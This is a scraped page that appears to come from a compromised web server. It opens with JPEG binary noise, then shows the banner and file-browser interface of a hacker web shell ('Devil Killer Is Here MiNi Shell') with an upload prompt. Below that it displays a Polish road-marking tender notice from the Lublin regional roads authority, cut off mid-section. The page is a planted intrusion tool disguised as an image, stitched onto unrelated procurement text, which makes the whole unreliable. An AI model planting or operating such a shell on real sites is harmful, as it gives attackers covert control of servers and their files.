JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250530/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250530/0025645901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Odtworzenie oznakowania poziomego na drogach wojewódzkich administrowanych przez Zarząd Dróg Wojewódzkich w Lublinie w 2025 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Wojewódzkich w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019170</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohdana Dobrzańskiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-262</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdw.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdw.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odtworzenie oznakowania poziomego na drogach wojewódzkich administrowanych przez Zarząd Dróg Wojewódzkich w Lublinie w 2025 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-caa3be72-db91-45b6-a696-788f93aaf104</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00256459</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00084129/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.43 ZDW w Lublinie.Odtworzenie oznakowania poziomego na drogach wojewódzkich, administrowanych przez ZDW w Lublinie w 2025 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdw-lublin.logintrade.net/zapytania_email,198573,24c4e225ec5dbc3c26563dabe076f7e8.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu art. 2 pkt 5) ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t. j. Dz. z 2024, poz. 1513), tj. za pomocą elektronicznej Platformy Zamówień Publicznych Zarządu Dróg Wojewódzkich w Lublinie pod adresem:<br/>https://zdw-lublin.logintrade.net/zapytania_email,198573,24c4e225ec5dbc3c26563dabe076f7e8.html (dalej zwaną: „Platformą”), do której dostęp możliwy jest również poprzez stronę internetową Zamawiającego wskazaną w pkt I.<br/><br/>2.	Niniejsze postępowanie znajduje się w wykazie postępowań prowadzonych przez Zamawiającego zamieszczonych na Platformie.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji<br/>wynosi 150 MB.<br/>2. Ilekroć w Specyfikacji Warunków Zamówienia lub w przepisach o zamówieniach publicznych mowa jest o stronie internetowej<br/>należy przez to rozumieć Platformę.<br/>3. Postępowania zakupowe prowadzone są przy użyciu środków komunikacji elektronicznej. Komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu Platformy Przetargowej Zarządu Dróg Wojewódzkich w Lublinie https://zdwlublin.<br/>logintrade.net/. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy<br/>protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na<br/>Platformie Przetargowej Zarządu Dróg Wojewódzkich w Lublinie: ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a<br/>także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych<br/>obszarach.<br/>4. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy użyciu Platformy Przetargowej Zarządu Dróg Wojewódzkich w Lublinie:<br/>a) Dopuszczalne przeglądarki internetowe: Edge, Google Chrome, Mozilla Firefox, Opera<br/>b) Pozostałe wymagania techniczne: dostęp do sieci Internet, obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax,<br/>włączona obsługa JavaScript, zalecana szybkość łącza internetowego powyżej 500 KB/s, zainstalowany Acrobat Reader,<br/>zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>c) Instrukcje składania ofert środkiem komunikacji elektronicznej w postępowaniach dostępne są na stronie https://zdwlublin.<br/>logintrade.net/rejestracja/instrukcje.html w zakładce INSTRUKCJE.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀁􀀁 administratorem Pani/Pana danych osobowych jest Dyrektor ZDW w Lublinie, ul. Bohdana Dobrzańskiego 3, 20-262 Lublin.<br/>􀀁􀀁 z inspektorem danych osobowych Zarządu Dróg Wojewódzkich w Lublinie można skontaktować się za pomocą e-maila:<br/>iod@zdw.lublin.pl*<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego: Odtworzenie oznakowania poziomego na drogach wojewódzkich administrowanych przez Zarząd Dróg Wojewódzkich w Lublinie w 2025 roku<br/>prowadzonym w trybie podstawowym.<br/>􀀁􀀁 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 4 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320.),<br/>dalej „ustawa Pzp”;<br/>􀀁􀀁 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>􀀁􀀁 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 􀀁􀀁 w odniesieniu do<br/>Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>􀀁􀀁 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu<br/>przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu<br/>oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZU.371.44.2025.pk</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie Nr I – RDW w Białej Podlaskiej:<br/>Drogi Nr: 806, 808, 811, 812, 813, 816, 698, 803, 807<br/>Malowanie cienkowarstwowe linie osiowe :	19 292 m2<br/>Malowanie cienkowarstwowe linie krawędziowe:	31 573 m2<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe: 6 776 m2<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:	295 m2<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych	196 m2<br/>Ścieranie zbędnego oznakowania:	48 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233221-4 - Malowanie nawierzchi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych (art. 214 ust. 1 pkt 7 pzp), na kwotę<br/>nie większą niż: Zadanie I- 375 000, 00 zł netto 1) zakres tych robót budowlanych:<br/>Malowanie cienkowarstwowe linie osiowe :<br/>Malowanie cienkowarstwowe linie krawędziowe:<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe:<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych<br/>Symbole znaków – piktogramy oznakowanie grubowarstwowe z mas termoplastycznych<br/>Malowanie cienkowarstwowe miejsc parkingowych przeznaczonych dla osób niepełnosprawnych (kolor niebieski):<br/>Ścieranie zbędnego oznakowania<br/>2) Warunki na jakich zostaną udzielone zamówienia o których mowa w art. 214 ust. 1 pkt 7) ustawy pzp:<br/>- uzyskania oszczędności przetargowych,<br/>- pozyskania dodatkowych środków w budżecie na 2025 r.<br/>- w przypadku konieczności uzupełnienia oznakowania poziomego na odcinkach dróg, na których wykonano dodatkowe remonty cząstkowe i nakładki po terminie umownym wykonania oznakowania poziomego określonym w umowie podstawowej lub w przypadku konieczności wprowadzenia zmian z stałej organizacji ruchu na podstawie zatwierdzonych nowych projektów organizacji ruchu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena – znaczenie kryterium 60%<br/>Oferta z najniższą ceną otrzyma PC= 10 pkt.<br/>Pozostałe oferty otrzymają liczbę punktów obliczoną według następującego wzoru:<br/>PC=(Cena oferty najtańszej)/(Cena oferty ocenianej ) x10<br/>2. oferowana jakość wykonania – znaczenie kryterium 40%<br/>Kryterium jakości wykonania zostanie ocenione na podstawie oferowanego parametru widzialności oznakowania cienkowarstwowego w nocy<br/>Malowanie użytkowane (w okresie rękojmi)<br/>- nie mniej niż 100 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach, od daty odbioru ostatecznego PR -= 0 pkt.<br/>- nie mniej niż 120 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach od daty odbioru ostatecznego PR -= 10<br/>pkt.<br/>W przypadku nie wskazania zaoferowanego parametru Zamawiający przyjmie, iż Wykonawca oferuje parametr nie mniejszy niż 100<br/>mcd * m-2 * lx-1.<br/>Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą łączną ilość punktów na dane Zadanie obliczoną według wzoru:<br/>P = PC x 60 % + PR x 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oferowana jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie Nr II – RDW w Chełmie:<br/>Drogi Nr: 812, 842, 844, 846, 829, 837, 838, 841, 843<br/>Malowanie cienkowarstwowe linie osiowe :	8 136 m2<br/>Malowanie cienkowarstwowe linie krawędziowe:	18 209 m2<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe: 4 003 m2<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych:	50 m2<br/>Ścieranie zbędnego oznakowania:	50 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233221-4 - Malowanie nawierzchi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych robót budowlanych (art. 214 ust. 1 pkt 7 pzp), na kwotę<br/>nie większą niż: Zadanie II- 375 000, 00 zł netto 1) zakres tych robót budowlanych:<br/>Malowanie cienkowarstwowe linie osiowe :<br/>Malowanie cienkowarstwowe linie krawędziowe:<br/>Linie na skrzyżowaniach i przejściach dla pieszych – oznakowanie cienkowarstwowe:<br/>Malowanie grubowarstwowe linie osiowe i krawędziowe z mas chemoutwardzalnych:<br/>Linie na skrzyżowaniach przejściach dla pieszych, pasy spowalniające z mas chemoutwardzalnych<br/>Symbole znaków – piktogramy oznakowanie grubowarstwowe z mas termoplastycznych<br/>Malowanie cienkowarstwowe miejsc parkingowych przeznaczonych dla osób niepełnosprawnych (kolor niebieski):<br/>Ścieranie zbędnego oznakowania<br/>2) Warunki na jakich zostaną udzielone zamówienia o których mowa w art. 214 ust. 1 pkt 7) ustawy pzp:<br/>- uzyskania oszczędności przetargowych,<br/>- pozyskania dodatkowych środków w budżecie na 2025 r.<br/>- w przypadku konieczności uzupełnienia oznakowania poziomego na odcinkach dróg, na których wykonano dodatkowe remonty cząstkowe i nakładki po terminie umownym wykonania oznakowania poziomego określonym w umowie podstawowej lub w przypadku konieczności wprowadzenia zmian z stałej organizacji ruchu na podstawie zatwierdzonych nowych projektów organizacji ruchu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena – znaczenie kryterium 60%<br/>Oferta z najniższą ceną otrzyma PC= 10 pkt.<br/>Pozostałe oferty otrzymają liczbę punktów obliczoną według następującego wzoru:<br/>PC=(Cena oferty najtańszej)/(Cena oferty ocenianej ) x10<br/>2. oferowana jakość wykonania – znaczenie kryterium 40%<br/>Kryterium jakości wykonania zostanie ocenione na podstawie oferowanego parametru widzialności oznakowania cienkowarstwowego w nocy<br/>Malowanie użytkowane (w okresie rękojmi)<br/>- nie mniej niż 100 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach, od daty odbioru ostatecznego PR -= 0 pkt.<br/>- nie mniej niż 120 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach od daty odbioru ostatecznego PR -= 10<br/>pkt.<br/>W przypadku nie wskazania zaoferowanego parametru Zamawiający przyjmie, iż Wykonawca oferuje parametr nie mniejszy niż 100<br/>mcd * m-2 * lx-1.<br/>Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą łączną ilość punktów na dane Zadanie obliczoną według wzoru:<br/>P = PC x 60 % + PR x 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oferowana jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu 